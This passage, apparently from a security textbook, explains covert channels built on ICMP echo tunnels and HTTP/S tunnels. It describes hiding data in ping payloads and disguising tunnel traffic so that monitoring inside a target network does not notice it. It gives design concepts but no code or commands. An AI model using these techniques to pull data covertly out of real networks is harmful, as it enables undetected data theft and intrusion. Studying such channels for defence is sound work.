Information Technology Reference
In-Depth Information
5 . 3
C o v e r t C h a n n e l s U s i n g I C M P Tu n n e l s
Even today many systems are vulnerable to this type of covert channel which were
discovered as long ago as 1996. The only requirement in order to send clandestine
information via ICMP packets is that the system permits ICMP_ECHO traffic.
Many consider this kind of traffic benign, as indeed it is in scope, the ICMP proto-
col being used to test or measure network performance or for network management.
ICMP packets are encapsulated in the IP datagrams. The first 32 bits of the ICMP
header are always the same and the rest of the header may contain any of fifteen
different types of message allowed by the protocol.
The ICMP messages that are vulnerable to this 'defect' are ICMP_ECHO (query)
and ICMP_ECHOREPLY (reply). But while we can send queries and get responses,
the protocol's design also makes it a potential vehicle for hidden data-streams. The
utility
Ping
, for example, sends and receives just such messages. So how can we send
and receive data using an ICMP tunnel?
ICMP_ECHO messages allow you to enter information in the Data field, normally
used to hold information on delay times and so on. However, the Data field is not
subject to control by any particular device and can therefore be used to send arbitrary
data thus creating a covert channel.
5.3.1
HTTP/S Tunnel
Various factors may be taken into consideration when designing a covert channel
based on HTTP, and there is no one way to do it. For instance one could look at
the server model to be implemented (such as http daemon, proxy or CGI); how to
confuse the traffic so as to disguise the channel further (proxy chains, generation of
noise, etc.); or the type of functionality required. Having examined these aspects, we
can turn to actually applying the model in practice; what http methods to use (GET,
CONNECT, POST
...
).
It may be useful, as with any covert channel implementation, to consider stegano-
graphic or cryptographic techniques to further confuse anyone observing the traffic
generated and render the communication even more invisible.
In principle, though, there must be two processes capable of working in synchrony:
one inside the network from which we wish to obtain information (or the network
into which we want to intrude) and another on the outside. The external server should
be accessible from the inside and if contacted must not raise the suspicions of any
controlling mechanism, whether automatic or not. Typically, given that we are deal-
ing with HTTP requests, the server must act as if it is capable of processing such
requests, while the client should send suitably coded information formally presented
as normal HTTP requests.
